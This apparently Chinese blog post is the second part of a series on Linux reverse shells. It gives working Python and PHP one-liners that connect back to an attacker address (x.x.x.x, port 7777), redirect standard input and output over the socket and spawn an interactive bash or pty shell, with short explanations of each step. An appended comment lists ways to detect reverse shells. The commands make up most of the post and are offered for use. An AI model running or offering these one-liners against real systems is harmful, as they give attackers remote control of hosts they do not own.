linux 反弹shell篇(二)

继上一篇linux中反弹shell的方法,除了bash、nc还有一些脚本的反弹

一、python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
export RHOST='x.x.x.x';export RPORT=7777;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv('RHOST'),int(os.getenv('RPORT'))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')'

我们有时候获取shell的交互不稳定的原因,就是因为获取到的shell不是标准的虚拟终端,而使用python则可以实现一个标准的虚拟终端环境。以上两个命令都可以实现python反弹。

python反弹命令的具体意义:

python一句话获取shell:python -c "import pty;pty.spawn('/bin/bash')"

-c:命令行执行;

import pty 引入标准库pty;

pty.spawn 使用pty的spawn方法调用/bin/bash获取一个标准的shell;

首先建立socket连接,然后使用os库的dup2的方法将标准输入、标准输出、标准错误输出重定向到监听端。然后使用os的supprocess在本地开启一个子进程,然后/bin/bash -i 开启交互。

php反弹

第一种方法:

php - 'exec("/bin/bash -i >& /dev/tcp/x.x.x.x/port 0>&1");'

这个就跟nc的方式差不多。

 第二种方法:

php -r '$sock=fsockopen("x.x.x.x",port);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

 地址符号上一篇有讲,在这里3代表使用fsockopen函数建立socket返回的文件描述符,将标准输入、输出和错误输出重定向到监听端。

注意:使用php反弹需要php关闭safe_mode 选项才可以使用exec函数。

这两篇总结选了几种常见的shell反弹方法。细节可能并不完整,大佬勿喷

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我像一条狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值